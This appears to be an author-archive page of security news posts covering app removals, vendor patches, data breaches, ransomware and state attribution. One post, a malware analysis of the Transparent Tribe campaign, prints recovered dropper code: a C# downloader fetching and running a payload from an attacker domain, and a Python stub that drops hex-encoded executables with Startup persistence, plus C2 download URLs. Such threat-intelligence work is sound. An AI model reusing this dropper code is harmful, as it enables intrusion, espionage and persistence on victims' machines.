Author Archives: Pierluigi Paganini

Google removed nearly 600 apps from the Play Store for ad policy violation

Google announced to have removed nearly 600 Android apps in the official Play Store that were violating two ad-related policies.

Google removed from the official Play Store nearly 600 Android apps that were violating two ad-related policies, it also banned the same apps from Google AdMob and Google Ad Manager.

“As part of our ongoing efforts — along with help from newly developed technologies — today we’re announcing nearly 600 apps have been removed from the Google Play Store and banned from our ad monetization platforms, Google AdMob and Google Ad Manager, for violating our disruptive ads policy and disallowed interstitial policy.” reads the Google announcement.

The apps violated disruptive ads policy and disallowed interstitial policy that were established to prevent mobile ad frauds.

Google remarks that its policies don’t allow apps containing deceptive or disruptive ads. Ads must only be displayed within the app serving them and the tech giant considers ads served in any app as part of the app. This means that the ads shown in the developers’ apps must be compliant with all Google policies.

Below the concept of disruptive ads described by Google in its policy: 

“Ads should not be shown in a way that results in inadvertent clicks. Forcing a user to click an ad or submit personal information for advertising purposes before they can fully use an app is prohibited.” reads the policy.

“Interstitial ads may only be displayed inside of the app serving them. If your app displays interstitial ads or other ads that interfere with normal use, they must be easily dismissable without penalty.”

Many users have noticed that some apps serve ads on a mobile device when the user is not active in their app, and clearly this behavior is not allowed by Google policies.

We describe these ads as “out-of-context” because they can be displayed in full screen at an inconvenient time, for example, while the users are accessing its mobile browser of is doing a different task.

“This is an invasive maneuver that results in poor user experiences that often disrupt key device functions and this approach can lead to unintentional ad clicks that waste advertiser spend. For example, imagine being unexpectedly served a full-screen ad when you attempt to make a phone call, unlock your phone, or while using your favorite map app’s turn-by-turn navigation.” continues the announcement.

“Malicious developers continue to become more savvy in deploying and masking disruptive ads, but we’ve developed new technologies of our own to protect against this behavior”

Google revealed that it has recently developed an efficient machine-learning based approach to detect when apps show out-of-context ads, the company used this innovative technique to identify and remove the malicious apps from its Play Store.

Using machine learning, Google is now able to detect when apps display out-out-of-context ads. This method helped find the apps that have been removed from the Play Store.

“As we move forward, we will continue to invest in new technologies to detect and prevent emerging threats that can generate invalid traffic, including disruptive ads, and to find more ways to adapt and evolve our platform and ecosystem policies to ensure that users and advertisers are protected from bad behavior.” concludes the post.

Pierluigi Paganini

(SecurityAffairs – Android, Play Store)

The post Google removed nearly 600 apps from the Play Store for ad policy violation appeared first on Security Affairs.

VMware addresses serious flaws in vRealize Operations for Horizon Adapter

VMware has addressed serious vulnerabilities in vRealize Operations for Horizon Adapter, including remote code execution and authentication bypass flaws.

VMware vRealize Operations is a software product that provides operations management across physical, virtual and cloud environments, it supports environments based on vSphere, Hyper-V or Amazon Web Services.

Horizon Adapter instances created on VMware vRealize Operations Manager nodes allow users to receive communications from Horizon agents installed on virtual machines.

The three vulnerabilities in vRealize Operations for Horizon Adapter  (CVE-2020-3943, CVE-2020-3944, CVE-2020-3945) were reported by An Trinh, a cyber security expert from Vietnam’s telecommunications service provider Viettel.

Trinh did not share technical details about the vulnerabilities.

The most severe issue, tracked as CVE-2020-3943, is a remote code execution flaw rated as critical that can be exploited by an unauthenticated attacker with network access to vRealize Operations, with the Horizon Adapter running.

vRealize Operations for Horizon Adapter contains multiple security vulnerabilities.” reads an advisory published by VMware.

“vRealize Operations for Horizon Adapter uses a JMX RMI service which is not securely configured. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.0.

“An unauthenticated remote attacker who has network access to vRealize Operations, with the Horizon Adapter running, may be able to execute arbitrary code in vRealize Operations”

The second flaw, tracked as CVE-2020-3944 and rated high severity, could allow an unauthenticated attacker with access to the network to bypass Adapter authentication.

“vRealize Operations for Horizon Adapter has an improper trust store configuration leading to authentication bypass. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.6.” continues the advisory.

“An unauthenticated remote attacker who has network access to vRealize Operations, with the Horizon Adapter running, may be able to bypass Adapter authentication.”

The last flaw, tracked as CVE-2020-3945 and rated as moderate severity, is an information disclosure vulnerability caused by “incorrect pairing implementation between the vRealize Operations for Horizon Adapter and Horizon View.”

The flaws affect vRealize Operations for Horizon Adapter 6.6.x and 6.7.x on Windows. VMware released versions 6.6.1 and 6.7.1 to address the flaws.

Pierluigi Paganini

(SecurityAffairs – hacking, IOTA foundation)

The post VMware addresses serious flaws in vRealize Operations for Horizon Adapter appeared first on Security Affairs.

Exclusive: Pakistan and India to armaments: Operation Transparent Tribe is back 4 years later

Exclusive: Pakistan and India to armaments. Researchers from Cybaze-Yoroi ZLab gathered intelligence on the return of Operation Transparent Tribe is back 4 years later

Introduction

The Operation Transparent Tribe was first spotted by Proofpoint Researchers in Feb 2016, in a series of espionages operations against Indian diplomats and military personnel in some embassies in Saudi Arabia and Kazakhstan. At that time, the researchers tracked the sources IP in Pakistan, the attacks were part of a wider operation that relies on multi vector such as watering hole websites and phishing email campaigns delivering custom RATs dubbed Crimson and Peppy. These RATs are capable of exfiltrate information, take screenshot and record webcam streams.

This threat actor has vanished for a long period, and only the last month appeared another time probably for the actual tensions between two countries. We noticed that the TTP of the group is almost the same leveraging a weaponized document with a fake certificate of request of an Indian public fund. So, Cybaze-Yoroi ZLab team decided to dive deep into technical analysis.

Technical Analysis

Hash662c3b181467a9d2f40a7b632a4b5fe5ddd201a528ba408badbf7b2375ee3553
ThreatNew Operation Transparent Tribe Campaign
Brief DescriptionMalicious macro document of the new Campaign of Transparent Tribe
Ssdeep24576:Nh2axIaansJlyJ1prFnFmbX3ti6iEIb+R9mSXH9tBUnTqHT:Nhfx4nsPyJ1ppnEX3UCICRhXHXe

Table 1. Static information about the malicious macro 

The document presents itself as a request for a DSOP FUND (Defence Services Officers Provident Fund). It is a fund where an officer compulsorily deposits some money to Govt on a monthly basis out of his wages / salary. 

The Fund is financial planning for defense personnel. The money is kept by the government and in return, a “non-permanent” profit officially titled as “interest” is given back to the officers at the end of each year. The DSOP fund scheme has been set up as a “welfare measure” to the depositors while the wages remain barely meeting ends otherwise.

Figure 1: Piece of the malicious document employed in the Op. Transparent Tribe

Self-Extracting Macro

Analyzing the content of the Excel file, we notice that the file contains all the necessary components to perform the infection:

Figure 2: Piece of the malicious macro

The macro is not heavily obfuscated. The macro components are hidden as Hex or Decimal strings, which will be combined with each other to unleash the next stage of the infection.

Then it is possible to deobfuscate them.

Figure 3: Extracted component from the macro

The macro creates two folders inside %PROGRAMDATA% path, “systemidleperf” and “SppExtComTel”. 

Figure 4: Extracted files

Analyzing these files, we have a vbs script, a C# script and a zip file, inside this archive we found 4 PE artifacts:

Figure 5: Content of the “systemidleperf.zip” file

The SilentCMD Module

The two dll are legit windows library and are used in support of the malicious behaviour. Instead, the “windproc.scr” and “windprocx.scr” files are the compiled version of the utility SilentCMD publicly available on GitHub. SilentCMD executes a batch file without opening the command prompt window. If required, the console output can be redirected to a log file.

Figure 6: SilentCMD main routine

The SilentCMD utility is used to execute the commands pushed from the C2, and all of them will be executed without showing anything to the user. However, as previously mentioned, it is curious to notice that the malware installs two different variants of the executable, with the only difference in timestamp:

Figure 7: Comparison between the two files

The Real Time Module

The other extracted file is the “Realtime.cs” file, which is the source of a piece of code written in C#, and it is compiled and run during the execution of the macro. The code is very simple and it has the only purpose to download another component from the internet: 

  1. using System;
  2. using System.Collections.Generic;
  3. using System.Diagnostics;
  4. using System.IO;
  5. using System.Net;
  6. using System.Text;
  7. namespace Realtime
  8. {
  9. class Program
  10. {
  11. static void Main(string[] args)
  12. {
  13. WebClient wc = new WebClient();
  14. wc.DownloadFile(“http://www.awsyscloud.com/x64i.scr”, @”c:\\programdata\\systemidleperf\\x64i.scr”);
  15. Process proc = new Process();
  16. proc.StartInfo.FileName = Convert.ToString(args[0]);
  17. proc.StartInfo.Arguments = “/c ” + Convert.ToString(args[1]);
  18. proc.StartInfo.UseShellExecute = false;
  19. proc.StartInfo.CreateNoWindow = false;
  20. proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
  21. proc.Start();
  22. Environment.Exit(0);
  23. //Application.Exit();
  24. /* if (!proc.Start())
  25. {
  26. //Console.WriteLine(“Error starting”);
  27. return;
  28. }*/
  29. //proc.WaitForExit();
  30. }
  31. }
  32. }

Code snippet 1

The code is really simple, it has the function of downloading the file “x64i.scr” from the dropurl “awsysclou[.com” and then saves it into the folder “c:\programdata\systemidleperf\”. The file is immediately executed through the C# primitives.

The X64i.scr File

Hash7b455b78698f03c0201b2617fe94c70eb89154568b80e0c9d2a871d648ed6665
ThreatNew Operation Transparent Tribe Campaign
Brief DescriptionPython stub malware of the new Campaign of Transparent Tribe
Ssdeep196608:jXm2jfTjEzWt7+eW3TAPHULULN3erOAjsjAbpSzZTfuHO0y7:Lm2jfTgWt65U4UL9eCDHzZfyG7
Icon

Table 2. Static information about the Pyhton Stub

The icon of the executable let us understand that the malware has been forged through the usage of the tool Pyinstaller. It is a tool that permits a user to create a complete self-contained executable starting from a python source code. However, the two main disadvantages of choosing this solution are the high footprint of the executable (reaching more than 7.5MB and this generates a lot of noise inside the system); and the easiness to reverse the executable to obtain the source code.

So, after the operation of reversing, the extracted code of the malware is the following:

  1. from ctypes import *
  2. import socket, time, os, struct, sys
  3. from ctypes.wintypes import HANDLE, DWORD
  4. import platform
  5. import ctypes
  6. import _winreg
  7. import time
  8. import os
  9. import platform
  10. import binascii
  11. import _winreg
  12. import subprocess
  13. bitstream3 = “PAYLOAD_ONE”
  14. bitstream4 = “PAYLOAD_TWO”
  15. oses = os.name
  16. systems = platform.system()
  17. releases = platform.release()
  18. architectures = platform.architecture()[0]
  19. def main():
  20. try:
  21. runsameagain()
  22. except Exception as e:
  23. print str(e)
  24. def runsameagain():
  25. global bitstream3
  26. binstr = bytearray(binascii.unhexlify(bitstream3))
  27. if not os.path.exists(“c:\programdata\SppExtComTel”):
  28. os.makedirs(“c:\programdata\SppExtComTel”)
  29. WriteFile(“c:\programdata\SppExtComTel\SppExtComTel.scr”,binstr);
  30. bootup()
  31. subprocess.Popen([“c:\programdata\SppExtComTel\SppExtComTel.scr”, ‘–brilliance’])
  32. def rundifferentagain():
  33. global bitstream4
  34. binstr = bytearray(binascii.unhexlify(bitstream4))
  35. if not os.path.exists(“c:\programdata\SppExtComTel”):
  36. os.makedirs(“c:\programdata\SppExtComTel”)
  37. WriteFile(“c:\programdata\SppExtComTel\SppExtComTel.scr”,binstr);
  38. bootup()
  39. subprocess.Popen([“c:\programdata\SppExtComTel\SppExtComTel.scr”, ‘–brilliance’])
  40. def Streamers():
  41. try:
  42. rundifferentagain()
  43. return 1
  44. except Exception as e:
  45. print str(e)
  46. def WriteFile(filename,data):
  47. with open(filename,”wb”) as output:
  48. output.write(data)
  49. def bootup():
  50. try:
  51. from win32com.client import Dispatch
  52. from win32com.shell import shell,shellcon
  53. dpath = “c:\programdata\SppExtComTel”
  54. #print “before”
  55. Start_path = shell.SHGetFolderPath(0, shellcon.CSIDL_STARTUP, 0, 0)
  56. com_path = os.path.join(Start_path, “SppExtComTel.lnk”)
  57. target = os.path.join(dpath,”SppExtComTel.scr”)
  58. wDir = dpath
  59. icon = os.path.join(dpath, “SppExtComTel.scr”)
  60. shell = Dispatch(‘WScript.Shell’)
  61. shortcut = shell.CreateShortCut(com_path)
  62. shortcut.Targetpath = target
  63. shortcut.WorkingDirectory = wDir
  64. shortcut.IconLocation = icon
  65. shortcut.save()
  66. #print “there”
  67. #return True
  68. except Exception, e:
  69. print str(e)
  70. if __name__ == “__main__”:
  71. try:
  72. #print oses
  73. #print systems
  74. #print releases
  75. #print architectures
  76. if ‘.py’ not in sys.argv[0]:
  77. #sys.exit()
  78. #print “nothign to do”
  79. if systems == ‘Windows’ and releases == “7”:
  80. main()
  81. elif systems == ‘Windows’ and (releases == “8.1” or releases == “8”):
  82. Streamers()
  83. elif systems == ‘Windows’ and releases == “10”:
  84. #print “Please use a 64 bit version of python”
  85. #print “entering streamers”
  86. Streamers()
  87. else:
  88. Streamers()
  89. except Exception as e:
  90. print str(e)

Code snippet 2 

The python code is very simple to analyze and to explain. The first operation is to declare two global variables, “bitstream3” and “bitstream4”. They are the hexadecimal representation of two PE files, that will be deepened in the next sections. These two files are chosen according to the Windows OS version, as visible at the bottom of the code.

After that, the script writes the desired payload into the folder “c:\programdata\SppExtComTel\” and immediately executed it with the parameter “–brilliance”. After that, the malware guarantees its persistence through the  creation of a LNK file inside the Startup folder.

Figure 8: Persistence mechanism

The RAT

Figure 9: Static information about the Rat

As previously stated, the malware payload is the core component of the malware implant. 

As shown in the above figure, the malware is written in .NET framework and the creation date back to 29 Jan 2020. It is the date of the beginning of the malware campaign, also demonstrated by the registration records of the C2. The malware consists of a modular implant that downloads other components from the C2.

The first operation is to provide to the C2 a list of the running processes on the victim machine: 

Figure 10: C2 communication

The method used to send the information to the C2 is the following: 

Figure 11: C2 communication routine

After that, the malware loops in a cycle and waits for some commands coming from the C2:

Figure 12: Routine for the download of new modules

When the C2 sends some commands to instruct the bot, the malware downloads and executes other two components, which are two DLLs downloaded from the following URLs:

  • http[://awsyscloud[.com/E@t!aBbU0le8hiInks/B/3500/m1ssh0upUuchCukXanevPozlu[.dll
  • http[://awsyscloud[.com/E@t!aBbU0le8hiInks/D/3500/p2ehtHero0paSth3end.dll

The first DLL, once executed, has been renamed in “indexerdervice.dll”. This executable has got a sophisticated encryption method of communication with the C2: 

Figure 13: Evidence of the decrypting routine of the certificate

The above screen shows that the malware requests for an RSA key, which has to be validated by the highlighted text. If the check is positive, the malware can go on to its malicious actions, such as sending of information: 

Figure 14: Sending routine of the malware

The second malware module is a simple DLL having the purpose to download other components from the dropURL and then install it:

Figure 15: Evidence of the hard-coded AES key

The downloaded code has been encrypted through the Rijndael algorithm with a hard-coded key.

Conclusion

The Transparent tribe is back with a new campaign after several years of (apparently) inactivity. We can confirm that this campaign is completely new, relying on the registration record of the C2 that dates back to 29 January 2020. The decoy document presents itself as a request for a DSOP FUND  (Defence Services Officers Provident Fund) a providence fund for official and military personnel, confirming the espionage and counterintelligence character of this campaign. 

At last, we have no certainty that this campaign has been inactive for 4 years, it may be that it acted quietly, but, now the cyber criminal group is back in view of today’s tensions between the two countries.

Additional technical details, including Indicators of Compromise and Yara Rules, are reported in the analysis published by ZLab available here:

Pierluigi Paganini

(SecurityAffairs – hacking, Operation Transparent Tribe)

The post Exclusive: Pakistan and India to armaments: Operation Transparent Tribe is back 4 years later appeared first on Security Affairs.

DOD DISA US agency discloses a security breach

The Defense Information Systems Agency (DISA) US agency in charge of secure IT and communication for the White House has disclosed a data breach.

The Defense Information Systems Agency (DISA), the DoD agency that is in charge of the security of IT and telecommunications for the White House and military troops has suffered a cyber attack.

The agency sent a data breach notification to its employees last week informing them of a security breach that took place last year between May and July.

Hackers accessed employees’ personal details, including social security numbers. DISA is investigating the incident with federal authorities and is now offering free credit monitoring to all impacted individuals.

At the time it is not clear how many employees of the DISA agency have been impacted, the agency did not share any details on the incident for obvious reasons.

This kind of attacks could have severe consequences on homeland security, attackers could used the stolen data to carry out targeted attacks in the future with the intent of breach DoD networks.

This isn’t the first time that the DoD suffered a data breach, in October 2018 the Defense Department’s travel records was hacked and attackers compromised the personal information and credit card data of U.S. military and civilian personnel.

The data breach could have happened some months before and could have affected as many as 30,000 military and civilian personnel.

Pierluigi Paganini

(SecurityAffairs – hacking, US DISA)

The post DOD DISA US agency discloses a security breach appeared first on Security Affairs.

Dragos Report: Analysis of ICS flaws disclosed in 2019

More than 400 flaws affecting industrial control systems (ICS) were disclosed in 2019, more than 100 were zero-day vulnerabilities.

According to a report published by Dragos, the experts analyzed 438 ICS vulnerabilities that were reported in 212 security advisories, 26% of advisories is related to zero-day flaws.

The experts determined 116 unique types of flaws, the most common were improper input validation, stack-based buffer overflow, cross-site scripting (XSS), the use of hardcoded credentials, and uncontrolled resource consumption (i.e. DoS) issues.

ICS flaws 2019

The experts revealed that 77% of the assessed vulnerabilities were residing deep within a control system network, the flaws only affect products that belong on engineering workstations, human-machine interface (HMI) systems, operator panels, industrial network equipment, and field devices themselves. The researchers pointed out that their exploitation requires some existing access to a control systems network.

Only 9% of advisories were related to flaws in products associated with border systems (i.e. data historians, OPC servers, cross-domain web applications, and VPN services), their exploitation could potentially allow attackers to move from the IT to the OT networks.

Most of the advisories (roughly 75%) are related to vulnerabilities that could be exploited from the network, while the remaining flaws could be only exploited by attackers with local or physical access to the targeted machine.

The report analyzed the operational impact on industrial control processes for each issue. The threats against industrial processes result in three impact categories, the loss of view, the loss of control, or both.

“50% of advisories could cause both a loss of view and a loss.” reads the report published by Dragos. “5% of advisories could only cause a loss of view (but no loss of control) via exploitation.” “2% of advisories could result in a loss of control (but no loss of view) “

43& of advisories covered flaws that could not cause either loss of view or loss of control.

When dealing with mitigation advice the report states that 26% of advisories had no patch available when the initial advisory was disclosed. 76% of the advisories which had no patch did not offer mitigation advice exposing users to the risk of exploitation.

55% of advisories had a patch, but no alternate mitigation.

Additional details are included in the report published by Dragos.

Pierluigi Paganini

(SecurityAffairs – ICS, hacking)

The post Dragos Report: Analysis of ICS flaws disclosed in 2019 appeared first on Security Affairs.

Croatia’s largest petrol station chain INA group hit by ransomware attack

Some operations at INA Group, Croatia’s biggest oil company, and its largest petrol station chain were disrupted by a cyber attack.

A ransomware attack has disrupted operations at INA Group, Croatia’s biggest oil company, and its largest petrol station chain.

INA, d.d. is a stock company with the Hungarian MOL Group and the Croatian Government as its biggest shareholders, while a minority of shares is owned by private and institutional investors.

The company was not able to issue invoices and accept loyalty cards as a result of the attack that took place last Friday, on February 14, at 22:00, local time.

“The INA Group is under cyber-attack, which began around 10 pm on February 14, 2020, causing problems in the operation of certain IT systems, which can occasionally affect normal operation, such as issuing mobile phone vouchers, electronic vignettes, paying utility bills.” reads a security breach notice published by the company on its website. “Market supply is secure. Fuel sales at our retail locations continue unhindered. All payments are secure, whether it is a cash payment, an INA card or a bank card. INA is taking steps to remedy the system’s hassle.”

After the security breach, the company was still able to provide petrol fuel to its customers and to handle payments.

“Multiple sources have told ZDNet the cyber-attack is a ransomware infection that infected and then encrypted some of the company’s backend servers.” states ZDNet that first reported the issue.

“It did, however, impact its ability to issue invoices, register loyalty card use, issue new mobile vouchers, issue new electronic vignettes, and allow customers to pay gas utility bills (INA is also a natural gas provider in Croatia).”

The company announced it was working to restore all systems.

ZDNet, citing a source familiar with the incident, speculates the involvement of CLOP ransomware in the attack.

This family of ransomware involved in the attack was also spotted by researcher Vitali Kremez in December 2019. The malware targets Windows systems and attempts to disable security products running on the infected systems.

The malicious code executes a small program, just before starting the encryption process, to disable security tools running on the infected systems that could detect its operations.

The Clop ransomware also attempted to disable the Windows Defender by configuring the registry values associated with this defense feature

Pierluigi Paganini

(SecurityAffairs – INA Group, ransomware)

The post Croatia’s largest petrol station chain INA group hit by ransomware attack appeared first on Security Affairs.

UK, US and its allies blame Russia’s GRU for 2019 cyber-attacks on Georgia

Britain and the United governments blame Russia for being behind a destructive cyber attack that hit Georgia during 2019.

The governments of Britain and the US declared that Russia’s military intelligence service GRU is behind the massive cyber attack that hit Georgia during 2019.

In October 2019, a wave of cyber attacks hit 2,000 websites in Georgia, including the sites of the president, courts, and local media.

“The UK, Georgia and international partners have exposed the GRU’s – Russia’s military intelligence service – responsibility for a number of significant cyber-attacks against Georgia last year.” reads a press release published by Foreign & Commonwealth OfficeNational Cyber Security Centre, and The Rt Hon Dominic Raab MP.

“The National Cyber Security Centre (NCSC) assesses with the highest level of probability that on 28 October 2019 the GRU carried out large-scale, disruptive cyber-attacks. These were against a range of Georgian web hosting providers and resulted in websites being defaced, including sites belonging to the Georgian Government, courts, non-government organisations (NGOs), media and businesses, and also interrupted the service of several national broadcasters.”

Russian GRU

According to the statement, the cyber-attacks are part of Russia’s long-running campaign aimed at destabilising activity against Georgia. 

The government officials attribute the attack to the nation-state actor tracked as Sandworm, BlackEnergy, Telebots, and VoodooBear.

The group operated under the control of the GRU’s Main Centre of Special Technologies (aka ‘GTsST’ or field post number 74455).

That field post number 74455 is the same for the APT28 group (aka Fancy BearPawn StormSofacy GroupSednit, and STRONTIUM).

The APT28 group has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.

According to a report published by Symantec in October 2018, the group was actively conducting cyber espionage campaigns against government and military organizations in Europe and South America.

Starting in 2017 and continuing into 2018, the APT28 group returned to covert intelligence gathering operations in Europe and South America.

The UK intelligence confirmed that the attacks also caused the interruption of the transmissions of Georgian TV stations.

“The GRU’s reckless and brazen campaign of cyber-attacks against Georgia, a sovereign and independent nation, is totally unacceptable. The Russian government has a clear choice: continue this aggressive pattern of behaviour against other countries, or become a responsible partner which respects international law.” said the Foreign Secretary Dominic Raab.

“The UK will continue to expose those who conduct reckless cyber-attacks and work with our allies to counter the GRU’s menacing behaviour.”

The GRU unit involved in the attack was also considered responsible for the following cyber attacks:

  • BlackEnergy: December 2015 shut off part of Ukraine’s electricity grid, with 230,000 people losing power for between 1 to 6 hours
  • Industroyer: December 2016 shut off part of Ukraine’s electricity grid, also known as CrashOverride. It resulted in a fifth of Kyiv losing power for an hour. It is the first known malware designed specifically to disrupt electricity grids
  • NotPetya: June 2017 destructive cyber-attack targeting the Ukrainian financial, energy and government sectors and affecting other European and Russian businesses
  • BadRabbit: October 2017 ransomware encrypted hard drives and rendered IT inoperable. This caused disruption including to the Kyiv metro, Odessa airport, Russia’s central bank and 2 Russian media outlets

The UK Government consider Georgia is a strategic partner, it supports several projects in Georgia.

“This action contradicts Russia’s attempts to claim it is a responsible actor in cyberspace and demonstrates a continuing pattern of reckless Russian GRU cyber operations against a number of countries. These operations aim to sow division, create insecurity, and undermine democratic institutions.” foreign secretary Michael Pompeo said.

Pierluigi Paganini

(SecurityAffairs – GRU, APT28)

The post UK, US and its allies blame Russia’s GRU for 2019 cyber-attacks on Georgia appeared first on Security Affairs.

Adobe released out-of-band updates for After Effects and Media Encoder apps

Adobe released out-of-band security updates for After Effects and Media Encoder applications that address two new critical vulnerabilities.

Adobe released out-of-band security updates for After Effects and Media Encoder applications that fix two new critical vulnerabilities (CVE-2020-3765, CVE-2020-3764).

Adobe After Effects is a digital visual effects, motion graphics, and compositing application developed and used in the post-production process of film making, video games and television production. Adobe Media Encoder is transcoding and compressing app.

The two issued are classified as out-of-bounds write memory corruption flaws, an attacker could exploit them to execute arbitrary code on targeted systems by tricking victims into opening a specially crafted file using the vulnerable software.

The CVE-2020-3765 vulnerability in Adobe After Effects was discovered by security researcher Matt Powell and reported to Adobe via Trend Micro Zero Day Initiative project.

“Adobe has released an update for Adobe After Effects for Windows. This update resolves a critical out-of-bounds write vulnerability that could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

The CVE-2020-3764 flaw in Adobe Media Encoder was reported to Adobe by Canadian security researcher Francis Provencher.

“Adobe has released an update for Adobe Media Encoder. This update resolves  a critical out-of-bounds write vulnerability that could lead to arbitrary code execution in the context of the current user. ” reads the advisory published by Adobe.

The good news is that Adobe is not aware of attacks in the wild exploiting one of the two flaws.

Earlier this month, Adobe released February 2020 Patch Tuesday updates that address a total of 42 vulnerabilities in Framemaker, Acrobat and Reader, Flash Player, Digital Editions and Experience Manager products.

Most of the vulnerabilities (21) affect the Windows version of the Framemaker document processor. The most severe issues are classified as critical buffer overflow, heap overflow, out-of-bounds write, and memory corrupt flaws. The vulnerabilities can lead to arbitrary code execution in the context of the current user.

Pierluigi Paganini

(SecurityAffairs – hacking, Adobe)

The post Adobe released out-of-band updates for After Effects and Media Encoder apps appeared first on Security Affairs.

Cisco fixes a static default credential issue in Smart Software Manager tool

Cisco has released security updates to address 17 vulnerabilities affecting its networking and unified communications product lines.

Cisco has released security patches to fix 17 vulnerabilities affecting its networking and unified communications product lines.

The types of fixed vulnerabilities include remote access and code execution, elevation of privilege, denial of service, and cross-site request forgeries.

One of the flaws patched the IT giant is a critical issue, tracked as CVE-2020-3158, while six vulnerabilities are rated as high-risk severity.

The CVE-2020-3158 flaw is related to the presence of a system account that has a default and static password in the Smart Software Manager tool.

“A vulnerability in the High Availability (HA) service of Cisco Smart Software Manager On-Prem could allow an unauthenticated, remote attacker to access a sensitive part of the system with a high-privileged account.” reads the advisory published by Cisco.

“The vulnerability is due to a system account that has a default and static password and is not under the control of the system administrator.”

An attacker could exploit the flaw by using this default account to connect to a vulnerable system and obtain read and write access to system data.

The issue could expose a sensitive portion of the system, but Cisco pointed out that the attacker would not have full administrative rights to control the device.

The vulnerability affects Cisco Smart Software Manager On-Prem releases prior to the 7-202001 version, only if the High Availability (HA) feature is enabled (HA is not enabled by default).

Cisco Small Business Routers

Cisco also addressed privilege escalation vulnerabilities in Unified Contact Center (CVE-2019-1888) and Data Center Network Manager (CVE-2020-3112). The tech giant fixed a code execution vulnerability in NFV Infrastructure Sotware (CVE-2020-3138) that could be exploited only by local attackers.

The list of addressed flaws includes two DoS flaws, tracked CVE-2019-1947 and CVE-2019-1983 respectively, in the Cisco Email Security Appliance.

The remaining flaws patched by the company are a SQL injection in Cloud Web Security (CVE-2020-3154) and remote code execution bugs in the Cisco IP Phone (CVE-2020-3111).

Pierluigi Paganini

(SecurityAffairs – hacking)

The post Cisco fixes a static default credential issue in Smart Software Manager tool appeared first on Security Affairs.

Personal details of 10.6M MGM Resorts guests leaked online

The personal information of 10.6 million guests who stayed at MGM Resorts hotels was stolen by hackers this summer and posted a hacking forum this week.

ZDNet revealed in exclusive that the personal details of more than 10.6 million users who stayed at MGM Resorts hotels have been published on a hacking forum this week.

The list of customers whose data were stolen includes celebrities, tech CEOs, reporters (i.e. Twitter CEO Jack Dorsey, Justin Bieber), government officials, and employees at some of the major tech companies.

The huge trove of data contains personal details for 10,683,188 former hotel guests, including full names, home addresses, phone numbers, emails, and dates of birth.

MGM Resorts Dump (source ZDNet)

ZDNet validated the authenticity of the data contacting past guests of the hotel, including international business travelers, reporters attending tech conferences and CEOs attending business meetings.

The incident was confirmed by a spokesman for MGM via email.

“Within an hour after we reached out to the company, we were in a conference call with the hotel chain’s security team. Within hours, the MGM Resorts team was able to verify the data and track it to a past security incident.” reported ZDNet.

“An MGM spokesperson told ZDNet the data that was shared online this week stems from a security incident that took place last year.”

“Last summer, we discovered unauthorized access to a cloud server that contained a limited amount of information for certain previous guests of MGM Resorts,” MGM told ZDNet.

The company excluded that hackers have stolen financial and payment card data or passwords.

“We are confident that no financial, payment card or password data was involved in this matter.”

The MGM Resorts chain confirmed it has already notified all impacted hotel guests in reported the incident to the authorities.

The company also investigated the extent of the incident with the help of two cybersecurity forensics firms.

“At MGM Resorts, we take our responsibility to protect guest data very seriously, and we have strengthened and enhanced the security of our network to prevent this from happening again,” the company said.

The availability of the dump in a hacking forum was first reported by the security firm Under the Breach.

According to MGM Resorts, the data was old, none of the customers in the archive stayed at the hotel past 2017.

In November 2018, the Marriot hotel chain announced that data from as many as 500 million guests at its Starwood hotels may have been compromised by a security breach occurred in 2014.

The Marriot incident is the biggest data breach for the hospitality industry.

Pierluigi Paganini

(SecurityAffairs – hacking, MGM resorts)

The post Personal details of 10.6M MGM Resorts guests leaked online appeared first on Security Affairs.

Hackers are actively exploiting a Zero-Day in WordPress ThemeREX Plugin to create Admin Accounts

A new flaw was discovered in a WordPress plugin, this time experts found a zero-day vulnerability in the ThemeREX Addons to create admin accounts.

Security experts from WordFence have discovered a zero-day vulnerability in the ThemeREX Addons that was actively exploited by hackers in the wild to create user accounts with admin permissions.

According to WordFence, the ThemeREX Addons zero-day is currently installed on at least 44,000 websites.

This plugin was developed by the company ThemeRex to allow its customers to configure and installs one of over 460 commercial WordPress themes and templates that are available for sale in their online shop.

The vulnerability resides in a WordPress REST-API endpoint registered by the plugin which allows any PHP function to be executed without administrative permissions.

“One of the plugin’s functions registers a WordPress REST-API endpoint. When doing so, it does not verify that a request is coming from an administrative user. While this is not cause for concern on its own, the endpoint allows any PHP function to be executed, rather than being limited to a select few functions.” read the analysis published by WordFence. “The most worrisome capability that we are seeing actively attacked is the ability to create a new administrative user, which can be used for complete site takeover.”

A remote attacker could exploit the flaw to execute arbitrary code on WordPress installs running the flawed plugin, including code that can inject administrative user accounts.

Unfortunately, a patch has yet to be released, for this reason, experts suggest removing the ThemeREX Addons plugin if case sites are running version 1.6.50 and later.

“At the time of writing, this vulnerability is being actively exploited, therefore we urge users to temporarily remove the ThemeREX Addons plugin if you are running a version greater than 1.6.50 until a patch has been released.” continues the post.

The experts did not publish technical details of the zero-day because ongoing attacks are already exploiting it in the wild.

“We have intentionally provided minimal details in this post in an attempt to keep exploitation to a bare minimum while also informing WordPress site owners of this active campaign,” conclude the post.

“For the time being, we urge that site owners running the ThemeREX Addons plugin remove it from their sites immediately.”

Recently the issues with other WordPress plugins made the headlines:

  • Jan. 2020 – An authentication bypass vulnerability in the InfiniteWP plugin that could potentially impact by more than 300,000 sites.
  • Jan. 2020 – Over 200K WordPress sites are exposed to attacks due to a high severity cross-site request forgery (CSRF) bug in Code Snippets plugin.
  • Feb. 2020 – A serious flaw in the ThemeGrill Demo Importer WordPress theme plugin with over 200,000 active installs can be exploited to wipe sites and gain admin access to the site.
  • Feb. 2020 – A stored cross-site vulnerability in the GDPR Cookie Consent plugin that could potentially impact 700K users.

Pierluigi Paganini

(SecurityAffairs – hacking, IOTA foundation)

The post Hackers are actively exploiting a Zero-Day in WordPress ThemeREX Plugin to create Admin Accounts appeared first on Security Affairs.

DRBControl cyber-espionage group targets gambling, betting companies

The DRBControl APT group has been targeting gambling and betting companies worldwide with malware that links to two China-linked APT groups.

Security researchers from TrendMicro have uncovered a cyber espionage campaign carried out by an APT group tracked as DRBControl that employed a new family of malware. The attackers aimed at stealing databases and source code from gambling and betting companies in Southeast Asia, and likely in Europe and the Middle East.

